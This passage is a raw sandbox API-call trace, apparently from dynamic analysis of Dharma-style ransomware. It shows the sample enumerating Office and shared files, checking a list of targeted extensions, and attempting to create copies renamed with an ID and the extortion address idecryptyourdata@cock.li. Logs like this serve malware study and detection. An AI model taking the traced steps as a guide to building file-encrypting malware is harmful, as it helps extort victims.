hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.704] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\et\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\et\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.704] CloseHandle (hObject=0x534) returned 1 [0177.709] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.709] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\eu\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\eu\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.710] CloseHandle (hObject=0x534) returned 1 [0177.713] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.713] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.713] CloseHandle (hObject=0x534) returned 1 [0177.716] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.716] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fr\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fr\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.716] CloseHandle (hObject=0x534) returned 1 [0177.719] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.719] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.720] CloseHandle (hObject=0x534) returned 1 [0178.777] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.777] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\he\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.777] CloseHandle (hObject=0x2dc) returned 1 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703578 | out: hHeap=0x6a0000) returned 1 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b608 | out: hHeap=0x6a0000) returned 1 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3de0968 | out: hHeap=0x6a0000) returned 1 [0178.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3df0970 | out: hHeap=0x6a0000) returned 1 [0178.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4195020 | out: hHeap=0x6a0000) returned 1 [0178.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7035d8 | out: hHeap=0x6a0000) returned 1 [0178.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca00 [0178.785] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca00, Size=0x20) returned 0x458c178 [0178.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cb98 [0178.785] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cb98, Size=0x20) returned 0x458c240 [0178.785] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.785] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.785] Wow64DisableWow64FsRedirection (in: OldValue=0x377ff50 | out: OldValue=0x377ff50*=0x1) returned 1 [0178.786] lstrlenW (lpString="kernel32.dll") returned 12 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 [0178.786] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 Thread: id = 49 os_tid = 0xe90 [0155.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3e00978 [0155.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3e10980 [0155.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703620 [0155.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b418 [0155.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703638 [0155.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x42ac020 [0155.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703650 [0155.214] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703650, Size=0x20) returned 0x6ddf70 [0155.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703650 [0155.214] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703650, Size=0x20) returned 0x6dde80 [0155.214] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.214] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.214] Wow64DisableWow64FsRedirection (in: OldValue=0x38bff50 | out: OldValue=0x38bff50*=0x0) returned 1 [0155.214] lstrlenW (lpString="kernel32.dll") returned 12 [0155.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.214] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.214] Sleep (dwMilliseconds=0x64) [0155.599] Sleep (dwMilliseconds=0x64) [0156.204] Sleep (dwMilliseconds=0x64) [0156.868] Sleep (dwMilliseconds=0x64) [0157.262] Sleep (dwMilliseconds=0x64) [0157.482] Sleep (dwMilliseconds=0x64) [0157.906] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0157.906] lstrlenW (lpString="Alphabet.xml") returned 12 [0157.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.907] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=791421) returned 1 [0157.907] CloseHandle (hObject=0x428) returned 1 [0157.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0157.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.908] lstrlenW (lpString=".doc") returned 4 [0157.908] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0157.908] lstrlenW (lpString=".docx") returned 5 [0157.908] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0157.908] lstrlenW (lpString=".pdf") returned 4 [0157.908] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0157.908] lstrlenW (lpString=".xls") returned 4 [0157.908] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0157.908] lstrlenW (lpString=".xlsx") returned 5 [0157.908] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0157.908] lstrlenW (lpString=".ppt") returned 4 [0157.908] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0157.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.908] lstrlenW (lpString=".zip") returned 4 [0157.908] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0157.909] lstrlenW (lpString=".rar") returned 4 [0157.909] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString=".bz2") returned 4 [0157.909] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString=".7z") returned 3 [0157.909] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0157.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.909] lstrlenW (lpString=".dbf") returned 4 [0157.909] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.909] lstrlenW (lpString=".1cd") returned 4 [0157.909] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.909] lstrlenW (lpString=".jpg") returned 4 [0157.909] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.909] lstrlenW (lpString=".doc") returned 4 [0157.909] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString=".docx") returned 5 [0157.909] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0157.909] lstrlenW (lpString=".pdf") returned 4 [0157.909] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString=".xls") returned 4 [0157.909] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0157.909] lstrlenW (lpString=".xlsx") returned 5 [0157.909] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0157.910] lstrlenW (lpString=".ppt") returned 4 [0157.910] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0157.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.910] lstrlenW (lpString=".zip") returned 4 [0157.910] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0157.910] lstrlenW (lpString=".rar") returned 4 [0157.910] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0157.910] lstrlenW (lpString=".bz2") returned 4 [0157.910] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0157.910] lstrlenW (lpString=".7z") returned 3 [0157.910] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0157.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.910] lstrlenW (lpString=".dbf") returned 4 [0157.910] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0157.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.910] lstrlenW (lpString=".1cd") returned 4 [0157.910] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0157.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0157.910] lstrlenW (lpString=".jpg") returned 4 [0157.910] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0157.910] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0157.910] lstrlenW (lpString="Content.xml") returned 11 [0157.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.912] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=27045) returned 1 [0157.912] CloseHandle (hObject=0x428) returned 1 [0157.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0157.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.912] lstrlenW (lpString=".doc") returned 4 [0157.912] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0157.913] lstrlenW (lpString=".docx") returned 5 [0157.913] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0157.913] lstrlenW (lpString=".pdf") returned 4 [0157.913] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0157.913] lstrlenW (lpString=".xls") returned 4 [0157.913] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0157.913] lstrlenW (lpString=".xlsx") returned 5 [0157.913] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0157.913] lstrlenW (lpString=".ppt") returned 4 [0157.913] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0157.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.913] lstrlenW (lpString=".zip") returned 4 [0157.913] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0157.913] lstrlenW (lpString=".rar") returned 4 [0157.913] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0157.913] lstrlenW (lpString=".bz2") returned 4 [0157.913] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString=".7z") returned 3 [0157.914] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString=".dbf") returned 4 [0157.914] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString=".1cd") returned 4 [0157.914] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString=".jpg") returned 4 [0157.914] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString=".doc") returned 4 [0157.914] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString=".docx") returned 5 [0157.914] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0157.914] lstrlenW (lpString=".pdf") returned 4 [0157.914] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString=".xls") returned 4 [0157.914] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString=".xlsx") returned 5 [0157.914] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0157.914] lstrlenW (lpString=".ppt") returned 4 [0157.914] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0157.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.914] lstrlenW (lpString=".zip") returned 4 [0157.915] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0157.915] lstrlenW (lpString=".rar") returned 4 [0157.915] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0157.915] lstrlenW (lpString=".bz2") returned 4 [0157.915] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0157.915] lstrlenW (lpString=".7z") returned 3 [0157.915] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0157.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.915] lstrlenW (lpString=".dbf") returned 4 [0157.915] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0157.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.915] lstrlenW (lpString=".1cd") returned 4 [0157.915] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0157.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0157.915] lstrlenW (lpString=".jpg") returned 4 [0157.915] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0157.915] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0157.915] lstrlenW (lpString="boxed-correct.avi") returned 17 [0157.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.916] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=111320) returned 1 [0157.917] CloseHandle (hObject=0x428) returned 1 [0157.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0157.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.917] lstrlenW (lpString=".doc") returned 4 [0157.917] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.917] lstrlenW (lpString=".docx") returned 5 [0157.917] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0157.917] lstrlenW (lpString=".pdf") returned 4 [0157.917] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.917] lstrlenW (lpString=".xls") returned 4 [0157.917] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.917] lstrlenW (lpString=".xlsx") returned 5 [0157.917] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0157.917] lstrlenW (lpString=".ppt") returned 4 [0157.917] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.917] lstrlenW (lpString=".zip") returned 4 [0157.918] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".rar") returned 4 [0157.918] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".bz2") returned 4 [0157.918] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".7z") returned 3 [0157.918] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.918] lstrlenW (lpString=".dbf") returned 4 [0157.918] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.918] lstrlenW (lpString=".1cd") returned 4 [0157.918] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.918] lstrlenW (lpString=".jpg") returned 4 [0157.918] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.918] lstrlenW (lpString=".doc") returned 4 [0157.918] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".docx") returned 5 [0157.918] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0157.918] lstrlenW (lpString=".pdf") returned 4 [0157.918] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".xls") returned 4 [0157.918] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.918] lstrlenW (lpString=".xlsx") returned 5 [0157.919] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0157.919] lstrlenW (lpString=".ppt") returned 4 [0157.919] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.919] lstrlenW (lpString=".zip") returned 4 [0157.919] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.919] lstrlenW (lpString=".rar") returned 4 [0157.919] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.919] lstrlenW (lpString=".bz2") returned 4 [0157.919] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.919] lstrlenW (lpString=".7z") returned 3 [0157.919] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.919] lstrlenW (lpString=".dbf") returned 4 [0157.919] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.919] lstrlenW (lpString=".1cd") returned 4 [0157.919] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0157.919] lstrlenW (lpString=".jpg") returned 4 [0157.919] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.919] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0157.919] lstrlenW (lpString="boxed-delete.avi") returned 16 [0157.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 